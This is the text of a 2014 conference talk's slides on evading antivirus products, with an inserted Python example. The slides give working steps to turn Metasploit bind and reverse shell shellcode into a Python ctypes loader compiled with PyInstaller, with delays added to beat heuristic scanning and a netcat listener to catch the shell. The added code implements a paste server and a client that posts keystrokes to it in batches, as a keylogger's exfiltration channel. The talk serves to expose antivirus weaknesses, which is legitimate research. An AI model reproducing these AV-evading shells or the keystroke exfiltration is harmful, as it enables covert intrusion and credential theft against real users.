Violent Python
DEFCON Wall of Sheep
Fri., Aug 8, 2014
Bio
CNIT 124 Advanced Ethical Hacking
Violent Python
• Good coding principles
– Exception handling
– Modular design
– Optimization
– Commenting
– Flow charts
Violent Python
• We are hackers
• We are here to BREAK STUFF
• It should be fast and easy for a complete novice to hack together a simple script to do something fun!
Projects
Antivirus
Ungh! Good God y'all...
What is it GOOD For?
Mikko Hypponen Video
Metasploit Payloads
Metasploit
• Hundreds of payloads
• The simplest one: bind_tcp
• Listens on a TCP port for commands
Simple Reverse Shell
• One command to produce very simple Windows EXE malware
Antivirus Catches It
Norton v. Shell.exe
Norton Identifies the Metasploit Packer
VirusTotal: 37/49 Detections
How to Become 007
Python v. AV
Round 1
shell_bind_tcp
Export Metasploit Payloads to C
Use Ctypes Python Library
Compile it on Windows
• Install these things, in order
– Python 2.7
– PyWin32
– pip-Win
– PyInstaller
• This creates an EXE file that listens on a TCP port
DEMO
• On Kali:
msfpayload windows/shell_bind_tcp C > foo
nano foo
• Change top to:
from ctypes import *
shellcode = (
• Change bottom to:
)
memorywithshell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()
DEMO
• On Windows, in pip-Win:
venv -c -i pyi-env-name
pyinstaller --onefile --noconsole foo
VirusTotal: 1/50 Detection
Norton Support
• I Tweeted about this, and @NortonSupport replied
• VirusTotal is not a fair test, because real installed Norton uses Heuristic Scanning
• @NortonSupport gave me a link for a 30-day trial version :)
Norton Wins!
Kaspersky Wins!
• Avast! doesn't detect it
• Kaspersky detects it as HEUR:Trojan.Win32.Generic
Python v. AV
Round 2
shell_bind_tcp with a delay
DEMO
• On Kali:
cp foo foo2
nano foo2
Add this line at the top:
x=raw_input("Press Enter to continue")
• On Windows, in pip-Win:
venv -c -i pyi-env-name
pyinstaller --onefile foo2
Norton, Avast, & MSE Lose!
Kaspersky Wins!
Python v. AV
Round 3
shell_bind_tcp in two stages
no delay
Other AV
• Tested on Mar 24, 2014 with a two-stage reverse shell and no time delay
• All of these failed
– Norton
– Nod32
– Avast!
– 360 Internet Security
– McAfee
– Kaspersky
Remember Mikko?
F-Secure Wins!
AV Challenge
• Posted April 3, 2014
• No reply from AV vendors, but Norton improved its detection after that
– Now a delay is required
Python v. AV
Round 4
shell_bind_tcp with a delay
INSTRUCTIONS
• On Kali:
msfpayload windows/shell_reverse_tcp LHOST=192.168.119.252 C > rev
nano rev
• Change top to:
x=raw_input("Press Enter to continue")
from ctypes import *
shellcode = (
• Change bottom to:
)
memorywithshell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()
INSTRUCTIONS
• On Windows, in pip-Win:
venv -c -i pyi-env-name
pyinstaller --onefile rev
• On Kali:
nc -lp 4444
Norton Loses
Kaspersky Wins
Advanced Malware Protection
ty @ChrisAbdalla_1 from HP ESP TippingPoint
• A friend in the financial industry tested Evil.exe on a system protected by FireEye
• FireEye gives no alerts and lets it post keystrokes right to Pastebin
Python Keylogger
Google "Python Keylogger"
• I used this one from 4 years ago
Post Keystrokes to Pastebin
Problem
• Pastebin busted me for making too many pastes in a 24-hour period
• So I wrote my own Pastebin imitation
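The "Pastebin imitation" is easy to sketch, so here is one as an added example (editor's code, not the talk's keylogger or its server): a loopback HTTP drop that files each POSTed text with the sender's address and a timestamp, and a client-side batcher that posts keystrokes in chunks rather than one paste per key, which is the pattern that ran into Pastebin's per-day limit. The host, port, /paste path, JSON reply and the sample keystrokes are all assumptions or constructed; nothing here hooks the keyboard, key() is simply fed characters. Written for Python 3 (the talk used 2.7).

```python
"""Minimal self-hosted paste drop plus a batching client.

Editor's example, not the talk's code. Loopback only; the /paste path and the
JSON reply format are assumptions.
"""
import json
import threading
import time
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.request import Request, urlopen


class PasteStore:
    """In-memory paste log: id, client address, unix time, text."""

    def __init__(self):
        self._lock = threading.Lock()
        self.pastes = []

    def add(self, client_ip, text):
        with self._lock:
            paste_id = len(self.pastes) + 1
            self.pastes.append({"id": paste_id, "ip": client_ip,
                                "ts": time.time(), "text": text})
            return paste_id


class PasteHandler(BaseHTTPRequestHandler):
    MAX_BODY = 64 * 1024  # refuse oversized uploads instead of buffering them

    def do_POST(self):
        if self.path != "/paste":
            self.send_error(404)
            return
        length = int(self.headers.get("Content-Length", "0"))
        if length <= 0 or length > self.MAX_BODY:
            self.send_error(413)
            return
        body = self.rfile.read(length).decode("utf-8", "replace")
        paste_id = self.server.store.add(self.client_address[0], body)
        out = json.dumps({"id": paste_id}).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(out)))
        self.end_headers()
        self.wfile.write(out)

    def log_message(self, fmt, *args):
        pass  # keep the demo quiet; a real drop would log to a file


def start_drop(host="127.0.0.1", port=0):
    """Start the drop on a background thread; port 0 picks a free port."""
    server = ThreadingHTTPServer((host, port), PasteHandler)
    server.store = PasteStore()
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, "http://%s:%d/paste" % server.server_address


class KeystrokeBatcher:
    """Buffer keystrokes and post them as one paste per `max_keys` keys
    (or on flush) instead of one paste per key."""

    def __init__(self, url, max_keys=50):
        self.url, self.max_keys, self.buf, self.sent = url, max_keys, [], []

    def key(self, ch):
        self.buf.append(ch)
        if len(self.buf) >= self.max_keys:
            self.flush()

    def flush(self):
        if not self.buf:
            return None
        text, self.buf = "".join(self.buf), []
        req = Request(self.url, data=text.encode("utf-8"), method="POST",
                      headers={"Content-Type": "text/plain; charset=utf-8"})
        with urlopen(req, timeout=5) as resp:
            paste_id = json.load(resp)["id"]
        self.sent.append(paste_id)
        return paste_id


def demo():
    """Feed constructed keystrokes through the batcher; return stored pastes."""
    server, url = start_drop()
    try:
        batcher = KeystrokeBatcher(url, max_keys=8)
        for ch in "user pa55word!":  # constructed sample, 14 keystrokes
            batcher.key(ch)
        batcher.flush()
        return list(server.store.pastes)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for p in demo():
        print(p)
```

demo() starts the drop, sends fourteen constructed keystrokes through a batch size of eight, and returns the two pastes the server filed. From the defender's side the thing worth noticing is the traffic shape: small, periodic plain-text POSTs from an endpoint to one unfamiliar host, which is what a network sensor has to key on once the endpoint product has waved the binary through.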
Kaspersky & Avast! LOSE
Norton WINS!
But just add a delay...
F-Secure LOSES!
PRODUCT ANNOUNCEMENT!
Ultra-Advanced APT Tool
samsclass.info/evil.exe
UNSTOPPABLE
• None of these products stop it
– Norton
– McAfee
– Kaspersky
– Nod32
– F-Secure
– Avast!
– Microsoft Security Essentials